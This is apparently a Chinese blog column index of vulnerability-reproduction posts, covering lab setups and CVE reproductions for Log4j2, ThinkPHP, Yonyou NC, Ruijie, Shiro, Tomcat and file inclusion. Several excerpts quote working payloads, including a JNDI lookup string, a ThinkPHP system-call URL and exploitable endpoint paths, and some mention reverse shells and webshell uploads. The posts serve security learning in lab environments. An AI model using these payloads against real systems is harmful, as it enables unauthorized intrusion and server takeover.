
漏洞复现
文章平均质量分 59
复现一些漏洞
yyyyzzzllll
这个作者很懒,什么都没留下…
展开
-
锐捷RG-UAC统一上网行为管理审计系统信息泄露漏洞(CNVD-2021-14536)
锐捷RG-UAC统一上网行为管理审计系统信息泄露漏洞(CNVD-2021-14536)访问并打开是如下界面/get_dkey.php?user=adminmd5解密密码后成功登陆原创 2021-12-15 15:41:53 · 2591 阅读 · 1 评论 -
用友NC的一些漏洞复现
用友NC的一些漏洞复现一、BeanShell Test Servlet命令执行漏洞介绍:用友NC是面向集团企业的管理软件,其在同类市场占有率中达到亚太第一。该漏洞是由于用友NC对外开放了BeanShell接口,攻击者可以在未授权的情况下直接访问该接口,并构造恶意数据执行任意代码并获取服务器权限。影响范围:NC 6.5版本复现过程:访问对应网站后界面如下:漏洞url就是:ip地址:端口/servlet/~ic/bsh.servlet.BshServlet后续还可以写shell进去,但是这里不原创 2021-12-15 11:22:21 · 11665 阅读 · 7 评论 -
Log4j2远程命令执行复现
Log4j2远程命令执行复现 Log4j2远程命令执行复现一、漏洞环境二、漏洞验证三、反弹shell一、漏洞环境环境是http://vulfocus.fofa.so平台的二、漏洞验证启动环境后访问抓包,修改请求为post在数据中的Accept:头插入exp${jndi:ldap://8hqrxz.dnslog.cn}成功回显到dnslog平台三、反弹shell使用 JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar 生成payload可以在这里原创 2021-12-12 22:49:20 · 3987 阅读 · 0 评论 -
搭建vulfocus漏洞靶场
搭建vulfocus漏洞靶场首先准备好了一台centos7系统的虚拟机可以在这里下载http://mirrors.neusoft.edu.cn/centos/7/isos/x86_64/看自己需求下载然后安装dockercurl -fsSL https://get.docker.com | bash -s docker --mirror aliyun启动dockersystemctl start docker拉取镜像docker pull vulfocus/vulfocus:lat原创 2021-09-22 20:56:14 · 4843 阅读 · 4 评论 -
Pikachu漏洞平台搭建
Pikachu漏洞平台搭建Pikachu是一个带有漏洞的Web应用系统,包含了常见的web安全漏洞。靶场源码下载:https://github.com/zhuifengshaonianhanlu/pikachu解压至phpstudy的网站根目录解压然后启动服务并访问http://127.0.0.1/pikachu-master,会跳转到主页,但是这里没连接数据库,得修改一下配置文件文件位置 /pikachu-master/inc/config.inc.php红框位置修改成自己对应的然原创 2021-09-20 08:56:29 · 1771 阅读 · 0 评论 -
thinkphp-2x-rce 代码执行
thinkphp-2x-rce 代码执行打开环境漏洞描述ThinkPHP框架 - 是由上海顶想公司开发维护的MVC结构的开源PHP框架,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。 ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞 。在ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:$res = pre原创 2021-09-19 14:37:39 · 436 阅读 · 0 评论 -
InfluxDB 未授权访问漏洞复现
InfluxDB 未授权访问漏洞复现 InfluxDB 未授权访问漏洞复现漏洞介绍影响版本环境搭建漏洞复现漏洞介绍influxdb是一款著名的时序数据库,其使用jwt作为鉴权方式。在用户开启了认证,但未设置参数shared-secret的情况下,jwt的认证密钥为空字符串,此时攻击者可以伪造任意用户身份在influxdb中执行SQL语句。影响版本InfluxDB < 1.7.6环境搭建使用vulhub的漏洞环境cd /vulhub/influxdb/unaccdocker-compo原创 2021-09-19 13:48:01 · 863 阅读 · 0 评论 -
docker-compose 报错多容器冲突
docker-compose 报错多容器冲突漏洞复现的时候,想开启漏洞环境,docker-compose结果报错了,了解到是多容器冲突的问题报错内容如下:WARNING: Found orphan containers (unacc_slave_1, unacc_master_1) for this project. If you removed or renamed this service in your compose file, you can run this command with th原创 2021-09-18 22:11:56 · 2288 阅读 · 0 评论 -
文件包含漏洞学习(3)
文件包含漏洞学习(3)我们看到这一段代码<?php $filename = $_GET['filename']; include($filename . ".html");?>这里函数后面又添加了.html为后缀,对于有限制的文件包含漏洞,我们可以通过一些方法来绕过,不过也有先决条件:magic_quotes_gpc = Off php版本<5.3.4[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-KIyNvIaW-1631894转载 2021-09-18 00:09:49 · 518 阅读 · 0 评论 -
文件包含漏洞学习(2)
文件包含漏洞学习(2)参考:https://www.pianshen.com/article/5968384903/文件包含漏洞大致分为两种:LFI(本地包含漏洞)目录遍历可以理解为本地包含漏洞,验证以及利用方法都相同。RFI(远程包含漏洞)可以包含进其他主机的url地址,如自己开放一个www服务,然后在上面放一个木马文件,如果是代码会在这个机器上执行的。拿到shell的权限要看运行www服务的帐号。包含漏洞的特征:在某一个页面中,一个变量的值等于一个页面文件或者是一个固定的值,如?page=原创 2021-09-15 22:30:34 · 137 阅读 · 0 评论 -
搭建webug漏洞靶场
搭建webug漏洞靶场下载还phpstudy后,进入到www目录下将下载好的webug4.0的压缩包解压然后启动phpstudy本地访问漏洞地址,默认密码admin/admin登陆点击登陆后并没有跳转到对应页面,在网上GitHub找的一个版本有bug, 登陆后无法跳转到对应页面,不知道为什么。官方的文档如下,是在虚拟机下的,下载太慢了这里我不试了。。。https://pan.baidu.com/s/1fVTQY2wuNCRTQu5-BnelEA 提取码:lmzc...原创 2021-09-15 21:55:08 · 1000 阅读 · 0 评论 -
文件包含漏洞学习(1)---简单了解
文件包含漏洞学习(1)简介程序开发人员一般会把重复使用的函数写道单个文件中,需要使用某个函数时直接调用此文件,而无需再踩编写,这个文件调用的过程一般称为文件包含。有时候将包含的文件设置为变量,用来动态调试,这样就可能导致客户端可调用一个恶意文件,造成文件包含漏洞。文件包含漏洞常见于PHP语言中,但不代表其他的语言没有。文件包含函数php中文件包含函数有以下四种:require()require_once()include()include_once()include()和require(原创 2021-09-13 10:09:08 · 270 阅读 · 0 评论 -
Tomcat Session(CVE-2020-9484)反序列化漏洞复现
Tomcat Session(CVE-2020-9484)反序列化漏洞复现漏洞概述Apache Tomcat是由Apache软件基金会属下Jakarta项目开发的Servlet容器。 成功利用此漏洞需要同时满足以下4个条件: 1.攻击者能够控制服务器上文件的内容和文件名称; 2.服务器PersistenceManager配置中使用了FileStore; 3.PersistenceManager中的sessionAttributeValueClassNameFilter被配置为“null”,或者过滤器不够原创 2021-08-28 16:07:56 · 1765 阅读 · 0 评论 -
Apache Spark 未授权访问漏洞复现
Apache Spark 未授权访问漏洞复现 Apache Spark 未授权访问漏洞复现介绍环境搭建漏洞复现使用msf进行攻击另一个方法介绍Apache Spark是一款集群计算系统,其支持用户向管理节点提交应用,并分发给集群执行。如果管理节点未启动ACL(访问控制),我们将可以在集群中执行任意代码。环境搭建kali :192.168.89.130使用vulhub漏洞靶场搭建,进入目录下/spark/unacc ,运行 docker-compose up -d[外链图片转存失败,源站可能有防原创 2021-08-26 16:39:57 · 5596 阅读 · 3 评论 -
seacms 远程命令执行 (CNVD-2020-22721)
seacms 远程命令执行 (CNVD-2020-22721)漏洞描述海洋CMS一套程序自适应电脑、手机、平板、APP多个终端入口。 SeaCMS v10.1存在命令执行漏洞,在w1aqhp/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,直接写入文件。攻击者可利用该漏洞执行恶意代码,获取服务器权限。漏洞复现漏洞位置在系统的图片水印设置里面选取一张图片,然后上传burp拦截,修改参数放包,然后重新打开水印设置代码审计后续再整理...原创 2021-08-25 22:52:13 · 1454 阅读 · 0 评论 -
windows 永恒之蓝漏洞(MS17 -010)复现
内容被屏蔽了移步这个链接吧http://www.xtuyzl.cn/index.php/2021/08/09/windows-%e6%b0%b8%e6%81%92%e4%b9%8b%e8%93%9d%e6%bc%8f%e6%b4%9esm17-010%e5%a4%8d%e7%8e%b0/原创 2021-08-24 00:51:22 · 182 阅读 · 0 评论 -
CVE-2018-7602 Drupal 远程代码执行漏洞复现
CVE-2018-7602 Drupal 远程代码执行漏洞复现https://blog.51cto.com/u_14259144/2421816漏洞描述Drupal是Drupal社区的一套使用PHP语言开发的开源内容管理系统。 此漏洞源于对编号为CVE-2018-7600的漏洞修复不完全,导致补丁被绕过,攻击者可以利用Drupal网站漏洞,需要登录且有删除权限后触发执行恶意代码,导致网站被完全控制。环境搭建同样的vulhub镜像搭建,这里不再演示搭建完成如下登陆部分漏洞,利用poc命令执行,原创 2021-08-09 13:32:33 · 1096 阅读 · 0 评论 -
CVE-2018-7600 Drupal 远程代码执行漏洞分析复现
CVE-2018-7600 Drupal 远程代码执行漏洞分析复现漏洞描述Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成 该漏洞的产生的根本原因在于Drupal对表单的渲染上,攻击者可以利用该漏洞攻击Drupal系统的网站,执行恶意代码,最后完全控制被攻击的网站影响版本Drupal 6.xDrupal 7.xDrupal 8.x环境搭建使用vulhub镜像环境docker-compose up -d成原创 2021-08-09 13:27:45 · 898 阅读 · 0 评论 -
Tomcat8 + 弱口令 && 后台getshell 漏洞复现
Tomcat8 + 弱口令 && 后台getshell 漏洞复现环境开启启动docker开启镜像环境vulhub镜像中的tomcat8文件目录下,docker-compose up -d成功在主机上访问到漏洞复现根据弱密码tomcat/tomcat登陆管理后台或者使用tomcat爆破工具在下面位置可以找到上传点<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!cl原创 2021-08-08 21:25:21 · 3287 阅读 · 2 评论 -
Spring Cloud Config 目录穿越漏洞(CVE-2020-5410)复现
Spring Cloud Config 目录穿越漏洞(CVE-2020-5410)复现漏洞介绍Spring Cloud Config,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x版本以及较旧的不受支持的版本允许应用程序通过spring-cloud-config-server模块提供任意配置文件。恶意用户或攻击者可以使用特制URL发送请求,这可能导致目录遍历攻击影响版本Spring Cloud Config: 2.2.0 to 2.2.2Spring Cloud Config: 2.原创 2021-08-08 10:59:34 · 2654 阅读 · 1 评论 -
搭建Metasploitable靶机
搭建Metasploitable靶机开始本机下载后来解压直接报毒,上虚拟机操作(windows10)https://github.com/rapid7/metasploitable3下载好压缩包后通过共享文件传到虚拟机上下载packer(推荐1.35,报错更换版本)https://releases.hashicorp.com/packer/安装好你想要的版本后将exe文件放在想要的地方,然后添加上环境变量例如虚拟机中是如下位置在环境变量path里添加上即可然后cmd packer原创 2021-08-07 17:40:12 · 1473 阅读 · 0 评论 -
YApi Mock功能远程代码执行漏洞复现
YApi Mock功能远程代码执行漏洞复现漏洞描述API接口管理平台是国内某旅行网站的大前端技术中心开源项目,使用mock数据/脚本作为中间交互层,为前端后台开发与测试人员提供更优雅的接口管理服务,该系统被国内较多知名互联网企业所采用。 YApi 是高效、易用、功能强大的 api 管理平台。但因为大量用户使用 YAPI的默认配置并允许从外部网络访问 YApi服务,导致攻击者注册用户后,即可通过 Mock功能远程执行任意代码。影响版本YApi7月7日前版本,即版本<=1.92(后文有说明)环境原创 2021-08-06 20:23:37 · 1122 阅读 · 1 评论 -
upload-labs靶场1-21关一些思路
upload-labs靶场1-21关一些思路1、js绕过,后缀名绕过查看源码分析,允许上传的文件类型为.jpg|.png|.gif,可以抓包修改后上传修改后缀为php即可放包然后可以看到页面成功上传返回了地址,下面就可以利用工具进行连接了。这里看到地址 …/upload/2.php 这里…/是上一目录的意思所以地址是http://ip/upload-labs/upload/2.php 口令是sb用蚁剑连接如图,测试连接数据返回成功然后点击添加成功查看目录并且能访问所以有权原创 2021-08-04 23:45:30 · 2432 阅读 · 0 评论 -
ThinkPHP5x 远程代码执行漏洞(CNVD-2018-24942)复现
ThinkPHP5x 远程代码执行漏洞(CNVD-2018-24942)复现影响范围ThinkPHP 5.0.全版本5.0.13~5.0.19的,这些版本默认情况下config中的app_debug配置项为false,需开启才能存在此漏洞。漏洞复现远程代码执行直接get请求即可?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=pwdpw原创 2021-08-04 00:57:55 · 1649 阅读 · 0 评论 -
ThinkAdmin列目录/任意文件读取(CVE-2020-25540 )漏洞复现及环境搭建
ThinkAdmin列目录/任意文件读取(CVE-2020-25540 )漏洞复现漏洞介绍ThinkAdmin 是基于 ThinkPHP后台开发框架,在ThinkAdmin v6版本存在路径遍历漏洞,该漏洞可以利用GET请求编码参数读取远程服务器上任意文件。影响范围Thinkadmin ≤ 2020.08.03.01v5(任意文件读取)v6(列目录,任意文件读取)ThinkAdmin6环境搭建这里我使用的是kali linux靶机来搭建环境1、安装php环境查看版本发现没有,按照要求原创 2021-08-03 21:17:18 · 2918 阅读 · 0 评论 -
CVE-2017-12615Tomcat文件上传漏洞复现
CVE-2017-12615Tomcat文件上传漏洞复现漏洞描述2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,漏洞CVE编号:CVE-2017-12615和CVE-2017-12616,该漏洞受影响版本为7.0-7.80之间,在一定条件下,攻击者可以利用这两个漏洞,获取用户服务器上 JSP 文件的源代码,或是通过精心构造的攻击请求,向用户服务器上传恶意JSP文件,通过上传的 JSP 文件 ,可在用户服务器上执行任意代码,从而导致数据泄露或获取服务器权限,存在高安全风险漏原创 2021-07-31 15:50:11 · 972 阅读 · 4 评论 -
docker入门以及漏洞环境搭建
docker入门以及漏洞环境搭建安装docker此次docker选择在ubantu系统中安装,我用的系统是ubuntu18.04.4-x641、切换到root权限sudo su root2、更新源apt-get update3、安装curlapt-get -y install curlapt install curl这里两种命令都报错,用snap install curl 安装成功这样安装后使用得切到curl目录十分麻烦,退回去解决一下刚刚的报错将这里的依赖安装好如下图原创 2021-07-26 22:56:33 · 690 阅读 · 0 评论 -
CVE-2020-1938 Tomcat 文件读取包含漏洞复现
CVE-2020-1938 Tomcat 文件读取包含漏洞复现一次偶然的契机,起源于自己的站被日了,太菜了没找到原因,然后逛了逛室友的站,室友的友链中随便点了点友链什么的,发现shadon发现开了很多端口,并且同时打开了8009和8080想到最近爆出的文件包含漏洞,扫一下果真存在,也验证成功了,读取到了web.xml的源码用网上的脚本跑一下,读取WEB-INF/web.xml文件读取ROOT目录下的build.xml文件内容,没用这个文件,就会跳转到错误页面下面是自己搭建环境后的CVE-原创 2021-07-26 22:44:42 · 2702 阅读 · 0 评论 -
CVE-2016-4437 Apache Shiro 反序列化漏洞复现
Apache Shiro 反序列化漏洞复现(CVE-2016-4437)漏洞描述Apache Shiro是一个Java安全框架,执行身份验证、授权、密码和会话管理。只要rememberMe的AES加密密钥泄露,无论shiro是什么版本都会导致反序列化漏洞。使用burp抓包查看漏洞原理Apache Shiro框架提供了记住我(RememberMe)的功能,关闭了浏览器下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问。Shiro对rememberMe的cookie做了加密处理,shiro原创 2021-07-26 22:38:00 · 524 阅读 · 0 评论